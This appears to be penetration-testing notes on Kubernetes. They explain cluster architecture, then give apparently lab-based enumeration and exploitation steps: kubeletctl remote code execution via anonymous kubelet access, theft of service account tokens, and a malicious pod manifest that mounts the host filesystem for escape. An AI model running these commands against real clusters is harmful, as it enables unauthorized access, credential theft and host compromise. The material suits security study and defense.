Kubernetes
Container Orchestration Platform
Architecture
Kubernetes Control Plane
The brain of the Kubernetes cluster. It makes global decisions about the cluster and monitors the state of the cluster.
kube-apiserverIs the central point of communication for all Kubernetes components, all interaction go through it.
It exposes the
Kubernetes APIand serves as the front-end for the Kubernetes control plane.It handles requests for cluster state and writes/read operations to/from
etcd.Handles
authentication,authorization, andadmission control.
etcdIs a distributed key-value store used to store all cluster data and state; ensures that the state is replicated across multiple nodes.:
Configuration of all resources.
The
desired state.The
current state.
kube-controller-managerIs a daemon that runs in the control plane and manages the controllers that regulate the state of the cluster.
Controllersare responsible for ensuring the desired state of the cluster matches the current state. If there’s a mismatch, controllers take action to reconcile that state:For example, if a pod crashes, the
replication controllerwill create a new pod to maintain the desired number of replicas.
Some key controllers include:
Deployment controller: Ensures the desired number of pod replicas are running.Node controller: Monitors nodes for health and takes actions when nodes fail.Job controller: Manages the execution of batch jobs.
kube-schedulerIs responsible for scheduling pods to run on the worker nodes.
It watches for newly created pods that do not have a node assigned, and then selects the most appropriate node to run the pod based on resource requirements, node availability, and other constraints.
cloud-controller-managerInteracts with the cloud provider’s API to manage resources such as:
Managing load balancers.
Handling cloud-specific features.
It abstracts the cloud provider-specific logic, allowing Kubernetes to be agnostic to the underlying infrastructure.
Kubernetes Worker Node
Worker nodes are the machines running the actual application workloads. A Kubernetes cluster can have multiple worker nodes, and each one runs several essential components:
KubeletIs an agent that runs on every worker node.
It ensures that the containers described in the pod specs are running and healthy.
Monitors the state of the node and the pods running on it. It communicates with the API server to report the status of the node and its workloads.
If a pod is not running as expected, the
kubeletcan restart it.
Kube ProxyIs a network proxy that runs on every worker node.
It maintains network rules for pod communication, allowing services in the cluster to be accessed reliably.
It manages the
service abstractionby routing traffic to the correct pods. If a service points to multiple pods,kube-proxyensures the traffic is balanced between the pods using round-robin or other strategies.
Container RuntimeResponsible for running the containers on each node. It interacts directly with the underlying infrastructure.
When the
kubeletschedules a pod, the container runtime is used to pull the container images and start the containers.
PodsThe smallest and most basic deployable objects in Kubernetes. A pod represents one or more containers running together on the same node.
Pods share the same network namespace, which means they can communicate with each other using
localhostand share storage volumes.Typically, a pod is used to run a single container, but it can also contain multiple containers that work closely together (e.g., a main app container and a helper container like a logging agent)
Ports and Protocols
Read the documentation for
Ports and ProtocolsPort 8443is the default starting port for theAPI server in minikubeThe
kubeletagent listens onPort 10250
Enumeration
Kubeletctl can allow anonymous access, where may be possible to use the commands such as run and exec
kubeletctl pods -s 10.10.11.133kubeletctl runningpods -s 10.10.11.133 | jq -c '.items[].metadata | [.name, .namespace]'kubeletctl -s 10.129.96.98 scan rcekubeletctl -s 10.10.11.133 exec "/bin/bash" -p nginx -c nginx Default directories where token and certificate are stored:
/var/run/secrets/kubernetes.io/serviceaccount/run/secrets/kubernetes.io/serviceaccount/secrets/kubernetes.io/serviceaccoutAuthorize to the API using the token and certificate to be able to use it
export token=$(kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx)kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token get podkubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token get namespaceskubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token cluster-infokubectl auth can-i --list --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$tokenExploitation
Create a malicious Pod
It's possible to mount the host file system within a new container:
kubectl get pod nginx -o yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token apiVersion: v1
kind: Pod
metadata:
name: tokyo-pod
namespace: CHANGE ME
spec:
containers:
- name: tokyo-pod
image: CHANGE ME
volumeMounts:
- mountPath: /mnt
name: hostfs
volumes:
- name: hostfs
hostPath:
path: /
automountServiceAccountToken: true
hostNetwork: truekubectl apply -f evil-pod.yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$tokenkubeletctl -s 10.10.11.133 exec "/bin/bash" -p tokyo-pod -c tokyo-podLast updated